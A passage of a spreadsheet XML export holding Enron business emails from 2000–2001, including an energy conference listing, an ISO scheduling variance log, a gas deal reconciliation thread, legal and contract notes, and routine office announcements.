  [ ] 27-7361: Request more information on this listing_x000D_
  http://www.distributech.com_x000D_
_x000D_
7TH ANNUAL NATIONAL ETHANOL CONFERENCE:  POLICY &amp; MARKETING_x000D_
  2/27/02 to 3/1/02 - San Diego, CA USA_x000D_
  [ ] 27-7454: Request more information on this listing_x000D_
_x000D_
PETROLEUM PRODUCTS HEDGING &amp; RISK MANAGEMENT_x000D_
  2/27/02 to 2/28/02 - Houston, TX USA_x000D_
  [ ] 27-7505: Request more information on this listing_x000D_
_x000D_
PLANNING AND IMPLEMENTING POINT-TO-POINT MICROWAVE RADIO SYSTEMS_x000D_
  2/27/02 to 3/1/02 - Orlando, FL USA_x000D_
  [ ] 27-7517: Request more information on this listing_x000D_
_x000D_
THE RATEMAKING PROCESS_x000D_
  2/27/02 to 3/1/02 - Atlanta, GA USA_x000D_
  [ ] 27-7537: Request more information on this listing_x000D_
  http://www.southerngas.org/calendarinfo.cfm?cid=154_x000D_
_x000D_
5TH ANNUAL E SOURCE DISTRIBUTED ENERGY SUMMIT_x000D_
  2/27/02 to 3/1/02 - Boulder, CO US_x000D_
  [ ] 27-7541: Request more information on this listing_x000D_
_x000D_
27TH INTERNATIONAL TECHNICAL CONFERENCE ON COAL UTILIZATION &amp; FUEL SYSTEMS_x000D_
  3/4/02 to 3/7/02 - Clearwater, FL USA_x000D_
  [ ] 27-6945: Request more information on this listing_x000D_
_x000D_
DDC FOR HVAC CONTROLS_x000D_
  3/4/02 to 3/8/02 - Ontario, CA USA_x000D_
  [ ] 27-7449: Request more information on this listing_x000D_
_x000D_
COGENERATION TECHNOLOGY_x000D_
  3/4/02 to 3/8/02 - Ontanrio, CA USA_x000D_
  [ ] 27-7453: Request more information on this listing_x000D_
_x000D_
THE MERCHANT POWER DEVELOPMENT INSTITUTE_x000D_
  3/4/02 to 3/8/02 - Atlanta, GA USA_x000D_
  [ ] 27-7534: Request more information on this listing_x000D_
_x000D_
_x000D_
____________________________________________________________________________x000D_
_x000D_
  SEARCH THE ENERGY CENTRAL EVENTS DATABASE!!!_x000D_
  Go To:   http://www.energycentral.com/sections/events/_x000D_
____________________________________________________________________________x000D_
_x000D_
_x000D_
_x000D_
____________________________________________________________________________x000D_
_x000D_
  DIRECTIONS, INFORMATION AND COPYRIGHT NOTICE_x000D_
____________________________________________________________________________x000D_
_x000D_
  This supplement to the Energy Central Daily News Service is provided _x000D_
  FREE to qualified professionals in the electric power industry._x000D_
  _x000D_
* Visit http://www.energycentral.com/sections/services to START, STOP, _x000D_
  or CHANGE FORMAT for all of your e-mail subscriptions._x000D_
_x000D_
* To BEGIN receiving the Daily News Service directly, send_x000D_
  a message with a subject of 'signup' to service@energycentral.com._x000D_
_x000D_
* To STOP receiving this supplement AND the Daily News Service, _x000D_
  send a message to remove@energycentral.com or call Member Services _x000D_
  at 303-782-5510._x000D_
_x000D_
  This supplement to the Energy Central Daily News Service may be _x000D_
  redistributed provided it is kept in its entirety._x000D_
_x000D_
TO RETRIEVE FULL TEXT ITEMS THROUGH YOUR E-MAIL SYSTEM:_x000D_
  1) Use your mail program to REPLY with the text of this message._x000D_
     (If REPLY is not available, try REDIRECT, FORWARD or RESEND)_x000D_
     (If none of these features are available, copy this message_x000D_
     and paste the text into a new message.)_x000D_
  2) For each item that you would like delivered, type an 'x' between_x000D_
     the brackets associated with that item.  Example: [x]_x000D_
     IMPORTANT: Do not change or delete any other text on that line!_x000D_
  3) Send your request to conferences@mail.energycentral.com._x000D_
     If you used the REPLY feature of your mail program, this address_x000D_
     should already be filled in._x000D_
_x000D_
  Copyright (c) CyberTech, Inc 2001. _x000D_
  Energy Central (r) is a registered trademark of Cybertech, _x000D_
  Incorporated._x000D_
_x000D_
_x000D_
____________________________________________________________________________x000D_
_x000D_
  END OF MESSAGE_x000D_
____________________________________________________________________________x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Sun, 22 Apr 2001 08:41:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Start Date: 4/22/01; HourAhead hour: 16;  &lt;CODESITE&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">Start Date: 4/22/01; HourAhead hour: 16;  No ancillary schedules awarded.  _x000D_
Variances detected._x000D_
Variances detected in Energy Import/Export schedule._x000D_
Variances detected in SC Trades schedule._x000D_
Variances detected in Load schedule._x000D_
_x000D_
    LOG MESSAGES:_x000D_
_x000D_
PARSING FILE --&gt;&gt; O:\Portland\WestDesk\California Scheduling\ISO Final _x000D_
Schedules\2001042216.txt_x000D_
_x000D_
---- Energy Import/Export Schedule ----_x000D_
$$$ Variance found in table tblINTCHG_IMPEXP._x000D_
     Details: (Hour: 16 / Preferred:  12.00 / Final:  11.98)_x000D_
  TRANS_TYPE: FINAL_x000D_
  SC_ID: ECTRT_x000D_
  MKT_TYPE: 2_x000D_
  TRANS_DATE: 4/22/01_x000D_
  TIE_POINT: PVERDE_5_DEVERS_x000D_
  INTERCHG_ID: EPMI_CISO_ERNIE_x000D_
  ENGY_TYPE: WHEEL_x000D_
_x000D_
_x000D_
_x000D_
---- SC Trades Schedule ----_x000D_
*** Final schedule not found for preferred schedule._x000D_
     Details:_x000D_
_x000D_
  TRANS_TYPE: FINAL_x000D_
  SC_ID: EPMI_x000D_
  MKT_TYPE: 2_x000D_
  TRANS_DATE: 4/22/01_x000D_
  TRADING_SC: CRLP_x000D_
  PNT_OF_INTRC: SP15_x000D_
  SCHED_TYPE: ENGY_x000D_
  PURCH_SALE: 1_x000D_
  DEAL_NO: 1_x000D_
$$$ Variance found in table tblInt_Interchange._x000D_
     Details: (Hour: 16 / Preferred: -20.00 / Final: -19.97)_x000D_
  TRANS_TYPE: FINAL_x000D_
  SC_ID: EPMI_x000D_
  MKT_TYPE: 2_x000D_
  TRANS_DATE: 4/22/01_x000D_
  TRADING_SC: SETC_x000D_
  PNT_OF_INTRC: SP15_x000D_
  SCHED_TYPE: ENGY_x000D_
  PURCH_SALE: 1_x000D_
  DEAL_NO: 1_x000D_
_x000D_
_x000D_
_x000D_
---- Load Schedule ----_x000D_
$$$ Variance found in table tblLoads._x000D_
     Details: (Hour: 16 / Preferred:  64.73 / Final:  64.61)_x000D_
  TRANS_TYPE: FINAL_x000D_
  LOAD_ID: PGE3_x000D_
  MKT_TYPE: 2_x000D_
  TRANS_DATE: 4/22/01_x000D_
  SC_ID: EPMI_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 26 Oct 2001 14:00:09 -0700 (PDT)</t>
  </si>
  <si>
    <t>thanks for the update!  have a good weekend if i don't see you!_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Maggi, Mike  _x000D_
Sent:	Friday, October 26, 2001 3:59 PM_x000D_
To:	Nelson, Michelle_x000D_
Subject:	_x000D_
_x000D_
im leaving</t>
  </si>
  <si>
    <t>Fri, 26 Jan 2001 01:39:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'jason.wolfe@enron.com', 'patrick.ryder@enron.com', 'anne.bike@enron.com', 'carole.frank@enron.com', 'chris.walker@enron.com'})</t>
  </si>
  <si>
    <t>Deals to be flipped to FT-US/CAND-ERMS book by Monday</t>
  </si>
  <si>
    <t xml:space="preserve">Please flip these if applicable._x000D_
_x000D_
DG_x000D_
---------------------- Forwarded by Darron C Giron/HOU/ECT on 01/26/2001 _x000D_
09:37 AM ---------------------------_x000D_
_x000D_
_x000D_
Stacey Vallejo_x000D_
01/26/2001 09:11 AM_x000D_
To: Jeffrey C Gossett/HOU/ECT@ECT, Darron C Giron/HOU/ECT@ECT, William _x000D_
Kelly/HOU/ECT@ECT, Kam Keiser/HOU/ECT@ECT, Luchas Johnson/NA/Enron@Enron, _x000D_
Victor Guggenheim/HOU/ECT@ECT_x000D_
cc: Cheryl Dawes/CAL/ECT@ECT _x000D_
Subject: Deals to be flipped to FT-US/CAND-ERMS book by Monday_x000D_
_x000D_
Hi guys,_x000D_
Here is a list of deals that I know of that need to be flipped to the _x000D_
FT-US/CAND-ERMS book right away.  Please go through your books to see if _x000D_
there are any deals that I might have missed._x000D_
_x000D_
FT-CENT_x000D_
QL0357.1_x000D_
_x000D_
FT-East_x000D_
QK7518.1_x000D_
QL0420.1_x000D_
QL0428.1_x000D_
_x000D_
FT-Northwest_x000D_
QK1495.1_x000D_
QK1523.1_x000D_
_x000D_
FT-NY_x000D_
QN1718.1_x000D_
_x000D_
FT-Ontario_x000D_
QI9616.1 QJ2975.1 QM8037.1_x000D_
QJ0701.1 QJ3180.1 QN1433.1_x000D_
QJ0885.1 QJ7611.1 QN4064.1_x000D_
QJ1074.1 QK1086.1_x000D_
QJ2553.1 QK4194.1_x000D_
_x000D_
FT-West_x000D_
QK0633.1 QL7513.1_x000D_
QK9592.1 QL7536.1_x000D_
QL6923.1 QL7991.1_x000D_
QL7500.1 QL8766.1_x000D_
_x000D_
G-DAILY-EST_x000D_
_x000D_
_x000D_
GD-New_x000D_
QL7501.1_x000D_
QM8047.1_x000D_
_x000D_
_x000D_
I didnt' come across any deals with Duke Energy Marketing LP and ECC in your _x000D_
books, so I think there may be some being booked still as ENA and DEMLP.  _x000D_
These all need to be flipped to settle in the FT-US/CAND-ERMS books like the _x000D_
rest of these deals.  I've spoken to Jennifer Denny with EOL about getting a _x000D_
program set up for Duke deals similar to ones we have with TransCanada Energy _x000D_
and Dynegy Canada so they automatically get booked to settle with ECC, but I _x000D_
don't think this has happened yet.  Please go through your books to make sure _x000D_
that no Duke deals have been missed._x000D_
_x000D_
Please let me know if you have any questions on this._x000D_
_x000D_
Thanks for all your help_x000D_
Stacey_x000D_
</t>
  </si>
  <si>
    <t>Mon, 27 Mar 2000 03:23:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'sandra.dial@enron.com'})</t>
  </si>
  <si>
    <t>Re: Columbia Gas of Ohio on CGAS for Jan 00</t>
  </si>
  <si>
    <t xml:space="preserve">Sandra, i have pathed this ticket in unify._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Sandra Dial@ECT_x000D_
03/24/2000 05:32 PM_x000D_
To: Chris Germany/HOU/ECT@ECT_x000D_
cc: Robert Allwein/HOU/ECT@ECT, Joann Collins/Corp/Enron@ENRON, Dick _x000D_
Jenkins/HOU/ECT@ECT _x000D_
_x000D_
Subject: Re: Columbia Gas of Ohio on CGAS for Jan 00  _x000D_
_x000D_
Please let me know when completed. Customer is waiting patiently for payment. _x000D_
Thanks._x000D_
_x000D_
Sandra_x000D_
x5-7213_x000D_
_x000D_
_x000D_
_x000D_
Chris Germany_x000D_
03/24/2000 04:32 PM_x000D_
To: Robert Allwein/HOU/ECT@ECT, Joann Collins/Corp/Enron@ENRON_x000D_
cc: Dick Jenkins/HOU/ECT@ECT, Sandra Dial/HOU/ECT@ECT _x000D_
Subject: Re: Columbia Gas of Ohio on CGAS for Jan 00_x000D_
_x000D_
Since we now feel certain ENA bought this gas on Jan 21st, please path the _x000D_
supply deal from COH (deal 153863) to one of those large CES deal tickets._x000D_
_x000D_
I'm still checking the tapes to see if we can recoup the cost from CES._x000D_
_x000D_
Joanne, to the best of your recollection, this gas did go to CES, correct?_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Chris Germany/HOU/ECT on 03/24/2000 04:26 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
Sandra Dial_x000D_
03/21/2000 06:40 AM_x000D_
To: Chris Germany/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: Columbia Gas of Ohio on CGAS for Jan 00  _x000D_
_x000D_
Chris,_x000D_
_x000D_
Status on this? _x000D_
_x000D_
Thanks._x000D_
_x000D_
S_x000D_
_x000D_
_x000D_
_x000D_
Chris Germany_x000D_
03/16/2000 10:26 AM_x000D_
To: Dick Jenkins/HOU/ECT@ECT_x000D_
cc: Sandra Dial/HOU/ECT@ECT _x000D_
Subject: Re: Columbia Gas of Ohio on CGAS for Jan 00_x000D_
_x000D_
Dick, I don't have this deal in my records as a sale to CES.  When you get _x000D_
back, let's look at your deal sheet and see if there are any notes._x000D_
_x000D_
_x000D_
---------------------- Forwarded by Chris Germany/HOU/ECT on 03/16/2000 10:25 _x000D_
AM ---------------------------_x000D_
_x000D_
_x000D_
Sandra Dial_x000D_
03/16/2000 08:36 AM_x000D_
To: Chris Germany/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: Columbia Gas of Ohio on CGAS for Jan 00  _x000D_
_x000D_
Can you check with Dick Jenkins on this, please. He was my contact on this. _x000D_
Thanks man._x000D_
_x000D_
_x000D_
_x000D_
Chris Germany_x000D_
03/15/2000 01:13 PM_x000D_
To: Sandra Dial/HOU/ECT@ECT, Victor Lamadrid/HOU/ECT@ECT, Robert _x000D_
Allwein/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: Columbia Gas of Ohio on CGAS for Jan 00  _x000D_
_x000D_
I spoke with Brian at CES .  He does not show this deal in his records.  I _x000D_
don't show it in my records either._x000D_
_x000D_
_x000D_
_x000D_
Sandra Dial_x000D_
03/14/2000 11:11 AM_x000D_
To: Chris Germany/HOU/ECT@ECT_x000D_
cc: Victor Lamadrid/HOU/ECT@ECT, Robert Allwein/HOU/ECT@ECT _x000D_
Subject: Re: Columbia Gas of Ohio on CGAS for Jan 00  _x000D_
_x000D_
Yes, I have an invoice. I'll bring to you this p.m (I was out yesterday)._x000D_
_x000D_
S_x000D_
_x000D_
_x000D_
_x000D_
Chris Germany_x000D_
03/13/2000 10:03 AM_x000D_
To: Sandra Dial/HOU/ECT@ECT_x000D_
cc: Victor Lamadrid/HOU/ECT@ECT, Robert Allwein/HOU/ECT@ECT _x000D_
Subject: Re: Columbia Gas of Ohio on CGAS for Jan 00_x000D_
_x000D_
Do we have an invoice from CGAS of Ohio?  I would like to see it if we do.  I _x000D_
don't show any record of a deal like this.  I'm going to send an email to my _x000D_
CES contact to see if he shows anything in his notes about this._x000D_
---------------------- Forwarded by Chris Germany/HOU/ECT on 03/13/2000 09:58 _x000D_
AM ---------------------------_x000D_
_x000D_
_x000D_
Robert Allwein_x000D_
03/13/2000 08:22 AM_x000D_
To: Victor Lamadrid/HOU/ECT@ECT_x000D_
cc: Sandra Dial/HOU/ECT@ECT, Chris Germany/HOU/ECT@ECT _x000D_
Subject: Re: Columbia Gas of Ohio on CGAS for Jan 00  _x000D_
_x000D_
Sandra, I just have to get with Chris Germany to see if he can confirm this _x000D_
deal. I will keep you posted. Thanks, Rob_x000D_
_x000D_
Chris, Deal # 153683, Please take a look at this and see if you can confirm _x000D_
that this was Buy/Sell or incremental. CES or EES? I have a supply but no _x000D_
market. Thanks_x000D_
_x000D_
_x000D_
_x000D_
Victor Lamadrid_x000D_
03/10/2000 03:21 PM_x000D_
To: Sandra Dial/HOU/ECT@ECT_x000D_
cc: Robert Allwein/HOU/ECT@ECT, Chris Germany/HOU/ECT@ECT _x000D_
Subject: Re: Columbia Gas of Ohio on CGAS for Jan 00  _x000D_
_x000D_
Most likely this is an offset to our term sale to CES on CGAS. Chris prepares _x000D_
CES invoices.  I don't know if he is aware of this. Most likely, there is an _x000D_
offsetting sale that is not in or we need to back off an existing path and _x000D_
replace with this purchase.   _x000D_
_x000D_
_x000D_
_x000D_
Sandra Dial_x000D_
03/10/2000 01:33 PM_x000D_
To: Stephanie Sever/HOU/ECT@ECT_x000D_
cc: Robert Allwein/HOU/ECT@ECT, Mark Feldman/HOU/ECT@ECT, Victor _x000D_
Lamadrid/HOU/ECT@ECT _x000D_
Subject: Re: Columbia Gas of Ohio on CGAS for Jan 00_x000D_
_x000D_
Stephanie,_x000D_
Can you change the year from 2001 to 2000 on the deal, please. _x000D_
Columbia Gas of Ohio, sitara #153863, purchase._x000D_
_x000D_
Mark, If you happen to have any info on who Enron sold the gas to (since _x000D_
we're buying from Col Gas of OH), let  Robert know--meanwhile he's checking _x000D_
with Robin and Chris on his end so he can path it._x000D_
_x000D_
Vic--this is only FYI. Robert's taking the lead on finding out the info he _x000D_
needs to get this pathed in the system._x000D_
_x000D_
Thanks all._x000D_
_x000D_
Sandra_x000D_
x5-7213_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Sandra Dial/HOU/ECT on 03/10/2000 01:25 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
Robert Allwein_x000D_
03/10/2000 10:25 AM_x000D_
To: Sandra Dial/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: Columbia Gas of Ohio on CGAS for Jan 00  _x000D_
_x000D_
The deal ticket has 2001 on it not 2000. Can you find out who they sold the _x000D_
gas to. Do you need this pathed and tracked and balanced? - Rob_x000D_
_x000D_
_x000D_
_x000D_
Sandra Dial_x000D_
03/10/2000 09:54 AM_x000D_
To: Robert Allwein/HOU/ECT@ECT, Victor Lamadrid/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Columbia Gas of Ohio on CGAS for Jan 00_x000D_
_x000D_
Robert/Victor,_x000D_
_x000D_
Can one of you check into this for me, please (you may also be getting a call _x000D_
from Mark Feldman from Volume)..._x000D_
_x000D_
_x000D_
Columbia Gas of Ohio, sitara #153863, flow date 1/21/00, 3,575 mm's. The deal _x000D_
is in sitara; however, I do not see anything nommed, etc in Unify (like the _x000D_
deal doesn't exist). Can you check on your end to see if there was some sort _x000D_
of glitch/error. According to Dick Jenkins, he agrees with the counterparty. _x000D_
Let me know what you find/fix so I can redraft and pay them. Could it be _x000D_
booked under another pipe? Call me later. Thanks._x000D_
_x000D_
S_x000D_
x5-7213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Tue, 23 Jan 2001 03:14:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Blue Dog Change Order</t>
  </si>
  <si>
    <t xml:space="preserve">This needs to be "TurboParked" (parties changed, GFinance advised).  Is there _x000D_
any special deal on payment for the change order?_x000D_
_x000D_
I'll figure out how to change the signature lines, etc._x000D_
_x000D_
Kay_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Ben F Jacoby@ECT_x000D_
01/22/2001 01:38 PM_x000D_
Sent by: Ben Jacoby@ECT_x000D_
To: Chris Booth/NA/Enron@Enron, Fred Mitro/HOU/ECT@ECT_x000D_
cc: Kay Mann/Corp/Enron@Enron _x000D_
_x000D_
Subject: Blue Dog Change Order_x000D_
_x000D_
Chris:_x000D_
 _x000D_
Are we already paying GE for the change order? Is GE pushing to have this _x000D_
resolved? Pending input from Kay, I would like to hold off documenting it _x000D_
until we deal with the contract assignment and ultimate disposition of the _x000D_
unit._x000D_
_x000D_
Please follow up with Kay._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Ben_x000D_
_x000D_
---------------------- Forwarded by Ben Jacoby/HOU/ECT on 01/22/2001 11:43 AM _x000D_
---------------------------_x000D_
_x000D_
_x000D_
Renee Alfaro@ENRON_DEVELOPMENT_x000D_
01/22/2001 12:19 PM_x000D_
To: Chris Booth/NA/Enron@Enron_x000D_
cc: Ben Jacoby/HOU/ECT@ECT, Matthew Tezyk/ENRON_DEVELOPMENT@Enron_Development _x000D_
Subject: Blue Dog Change Order_x000D_
_x000D_
Chris,_x000D_
_x000D_
On behalf of Matt Tezyk, please find attached below the Blue Dog Change Order _x000D_
for ENA's signature.  This had fallen through the cracks and Matt said that _x000D_
you would be handling it for me.  Thank you very much._x000D_
_x000D_
Once ENA has signed off on two (2) originals of the Change Order, you may _x000D_
return them to me at 3AC 712A.  I will then forward them to Jeffrey Darst for _x000D_
his signature.  Copies of the fully executed change order will be distributed _x000D_
upon return from GE._x000D_
_x000D_
Renee Alfaro_x000D_
Phone: 713-646-7281_x000D_
Fax: 713-646-6158_x000D_
Email: ralfaro@enron.com_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 28 Sep 2001 14:12:17 -0700 (PDT)</t>
  </si>
  <si>
    <t>Waiver form</t>
  </si>
  <si>
    <t>Mike,_x000D_
_x000D_
I have reviewed the NEPCO AGreement to separation pay and release of claims.  I believe that there are significant issues with this because it does not comply with the requirements of the Older Worker Benefit Protection Act._x000D_
_x000D_
I will send you a new waiver form to use.    The one you are using is not valid under the ADEA._x000D_
_x000D_
Michelle</t>
  </si>
  <si>
    <t>Fri, 8 Dec 2000 08:38:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'drew.fossum@enron.com', 'dave.neubauer@enron.com', 'glen.hass@enron.com', 'steve.kirk@enron.com'})</t>
  </si>
  <si>
    <t>Comments to GISB Opposing Partial Day Recalls</t>
  </si>
  <si>
    <t xml:space="preserve">Shelley, these comments look good.  I think they properly set forth  a _x000D_
structure to provide for these items as the entire market develops not prior _x000D_
to the service availability.  Most importantly, GISB isn't the business _x000D_
driver-  others please comment.   Remember,we aren't against its a _x000D_
timing/complete evaluation of the impacts to other service that hasn't been _x000D_
dealt with.  MK_x000D_
---------------------- Forwarded by Mary Kay Miller/ET&amp;S/Enron on 12/08/2000 _x000D_
04:32 PM ---------------------------_x000D_
_x000D_
_x000D_
Shelley Corman_x000D_
12/08/2000 03:42 PM_x000D_
To: Mary Kay Miller/ET&amp;S/Enron@ENRON, Teb Lokey/FGT/Enron@ENRON, Rita _x000D_
Bianchi/ET&amp;S/Enron@ENRON, Mary Darveaux/ET&amp;S/Enron@ENRON, Tamara _x000D_
Hopkins/ET&amp;S/Enron@ENRON, Julia White/ET&amp;S/Enron@ENRON, James _x000D_
Studebaker/FGT/Enron@ENRON, Shahnaz Lakho/FGT/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: Comments to GISB Opposing Partial Day Recalls_x000D_
_x000D_
FYI - Attached are the comments that I prepared for the pipeline segment to _x000D_
submit prior to the GISB EC vote next week on partial day recall._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 9 Oct 2001 08:09:08 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'jonalan.page@enron.com', 'jesse.bryson@enron.com', 'jennifer.thome@enron.com', 'stacey.bolton@enron.com', 'jeff.shields@enron.com', 'richard.ring@enron.com'})</t>
  </si>
  <si>
    <t>Call-in number</t>
  </si>
  <si>
    <t>The correct call-in number for our Tuesday call is 1-800-998-2462	PIN 5478626_x000D_
_x000D_
Elliot Mainzer_x000D_
Renewable Power Desk_x000D_
Enron North America_x000D_
121 SW Salmon St._x000D_
3WTC-0306_x000D_
Portland, OR  97201_x000D_
(503) 464-3706_x000D_
(503) 464-3740 (FX)_x000D_
(503) 709-6959 (CL)</t>
  </si>
  <si>
    <t>Thu, 14 Dec 2000 10:54:00 -0800 (PST)</t>
  </si>
  <si>
    <t>2001 Mileage Reimbursement Rate</t>
  </si>
  <si>
    <t>The IRS has announced that the standard mileage rate for use of a personal  _x000D_
automobile for business will be 34 1/2 cents per mile starting January 1, _x000D_
2001.  Enron's policy is to follow IRS guidelines, so use this rate for all _x000D_
mileage incurred on or after that date.</t>
  </si>
  <si>
    <t>Thu, 21 Dec 2000 05:47:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'christine.agnew@weil.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">I have GREAT tickets (behind the Rockets bench) to tonight's game against_x000D_
the Lakers.  It starts at 7:30.  Let me know if you are interested._x000D_
_x000D_
_x000D_
_x000D_
**********NOTE**********_x000D_
The information contained in this email message is intended only_x000D_
for use of the individual or entity named above.  If the reader_x000D_
of this message is not the intended recipient, or the employee or_x000D_
agent responsible to deliver it to the intended recipient, you_x000D_
are hereby notified that any dissemination, distribution or_x000D_
copying of this communication is strictly prohibited.  If you_x000D_
have received this communication in error, please immediately_x000D_
notify us by telephone (713-546-5000), and destroy the original_x000D_
message. Thank you._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 9 Apr 2001 16:49:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>New material added for Econ 201</t>
  </si>
  <si>
    <t>Some sample multiple choice questions have been added, look under "Course _x000D_
Documents" and the testing procedures are outlined under "Course Information"_x000D_
_x000D_
Scott</t>
  </si>
  <si>
    <t>Fri, 6 Apr 2001 09:40:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Execution Draft of ENA/PPL Letter Agmt</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;&lt;Letter Agmt Enron Turbines Delta Power.DOC&gt;&gt;_x000D_
_x000D_
Kay:_x000D_
_x000D_
Attached is the execution draft of the ENA/PPL Letter Agreement.   Let me_x000D_
know if you need anything else.  Thanks._x000D_
_x000D_
_x000D_
Carolyn M. Campbell_x000D_
King &amp; Spalding_x000D_
713-276-7307 (phone)_x000D_
713-751-3280 (fax)_x000D_
ccampbell@kslaw.com &lt;mailto:ccampbell@kslaw.com&gt;_x000D_
_x000D_
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 Letter Agmt Enron Turbines Delta Power.DOC</t>
  </si>
  <si>
    <t>Thu, 17 May 2001 07:43:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'john.viverito@enron.com', 'michael.robison@enron.com', 'sara.shackleton@enron.com', 'alan.aronowitz@enron.com', 'brent.hendry@enron.com', 'robert.bruce@enron.com', 'wayne.gresham@enron.com'})</t>
  </si>
  <si>
    <t>EGM Legal Group - Legal Forms Directory</t>
  </si>
  <si>
    <t>In an effort to help you select the "precedent" and "form" documents that you _x000D_
would like us to add to the EGM Legal Forms Directory, we have printed a hard _x000D_
copy of your files in "O:\Common\Legal" and delivered it to your in-box this _x000D_
afternoon.  The first page(s) of the index represents a list of all your _x000D_
subdirectories, the subsequent pages of the report lists all the documents _x000D_
saved to each of your subdirectories.   _x000D_
_x000D_
Once you have selected the "precedent" and "form" documents please let me _x000D_
know and I will coordinate with your assistant to get these documents copied _x000D_
to "O:\Common\Legal\Global Markets\Forms\Drafts" so that we can start the _x000D_
clean up process._x000D_
_x000D_
Many thanks._x000D_
_x000D_
Nony _x000D_
_x000D_
_x000D_
_x000D_
---- Forwarded by Nony Flores/HOU/ECT on 05/17/2001 02:23 PM -----_x000D_
_x000D_
	Alan Aronowitz_x000D_
	04/23/2001 10:45 AM_x000D_
		 _x000D_
		 To: Robert Bruce/NA/Enron@Enron, Ned E _x000D_
Crady/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Wayne Gresham/HOU/ECT@ECT, _x000D_
Matthias Lee/SIN/ECT@ECT, Jane McBride/AP/Enron@Enron, David _x000D_
Minns/ENRON_DEVELOPMENT@ENRON_DEVELOPMENt, Coralina _x000D_
Rivera/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Michael A Robison/HOU/ECT@ECT, _x000D_
Randy Young/NA/Enron@Enron, Daniel R _x000D_
Rogers/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, John Viverito/Corp/Enron@Enron, _x000D_
Robert Quick/LON/ECT@ECT, David Minns/ENRON_DEVELOPMENT@ENRON_DEVELOPMENt, _x000D_
Justin.Boyd@enron.com, Janet Wood/EU/Enron@Enron, Limor _x000D_
Nissan/NYC/MGUSA@MGUSA, Dominic Carolan/Enron@EnronXGate, Brent _x000D_
Hendry/NA/Enron@Enron, Sara Shackleton/HOU/ECT@ECT_x000D_
		 cc: Martha Braddy/ENRON_DEVELOPMENT@ENRON_DEVELOPMENt, Sarah _x000D_
Bruck/ENRON_DEVELOPMENT@ENRON_DEVELOPMENt, Nony Flores/HOU/ECT@ECT, Laurie _x000D_
Mayer/HOU/ECT@ECT, Angeline Poon/SIN/ECT@ECT, Connie _x000D_
Castillo/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Margaret _x000D_
Doucette/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Nita Garcia/NA/Enron@Enron, _x000D_
MaryHelen Martinez/NA/Enron@Enron, Becky Spencer/HOU/ECT@ECT_x000D_
		 Subject: EGM Legal Group - Legal Forms Directory_x000D_
_x000D_
We are in the process of restructuring the EGM Legal Forms Directory so that _x000D_
our forms and precedents can be available to everyone who works full or _x000D_
part-time in the group.  The goal is to centralize all forms and precedents _x000D_
pertaining to each of the commodities and businesses supported by EGM Legal.  _x000D_
A "precedent" would be a document from a deal you have worked on or otherwise _x000D_
that you think other members of the group should have access to in order to _x000D_
get ideas for developing other documents and agreements.  Precedents will not _x000D_
necessarily be converted to forms, and accordingly, would be used without _x000D_
form reliability.  A "form" would be a document already approved as a form _x000D_
within Enron Legal or EGM Legal.  We are going to establish a process for _x000D_
approval of forms, the details of which will be disseminated at a later _x000D_
time.  In order to facilitate this process, we have set up a special working _x000D_
folder as indicated below:_x000D_
_x000D_
A "Drafts" folder for each of the attorneys in our group has been set up in _x000D_
"O:\Legal\Global Markets\Forms\DRAFTS". We are still working on providing _x000D_
access to the directory to the Australia and Japan offices. Nony or Martha _x000D_
will contact David and Jane, respectively, to provide an alternate way to _x000D_
send the documents from those offices._x000D_
_x000D_
Please select the documents that you would like to add to the Forms Directory _x000D_
for EGM Legal and have your assistant copy these documents into the _x000D_
respective folder for clean up.  When copying them into the folder, they _x000D_
should be "saved as" or renamed with "YOUR INITIALS" (e.g., "DRR" for Dan _x000D_
Rogers, etc.).  This way we will know whom the forms belong to for questions _x000D_
during the clean up process.  Once finalized, the initials will be dropped _x000D_
from the document name; howeverthey would be included in the document _x000D_
footer.  Nony and Martha are available to assist you with this step in the _x000D_
process._x000D_
_x000D_
Please send an e-mail to Martha and Nony with the name and number of files _x000D_
you have placed into the folder._x000D_
_x000D_
_x000D_
So that we can have a good database from which to develop our forms directory _x000D_
for the benefit of all of us, please complete the above process by Tuesday, _x000D_
May 15._x000D_
_x000D_
Please feel free to contact Martha Braddy, Nony Flores, or me with any _x000D_
comments/questions you may have. Thank you in advance for your cooperation in _x000D_
this important effort._x000D_
_x000D_
Regards, Alan</t>
  </si>
  <si>
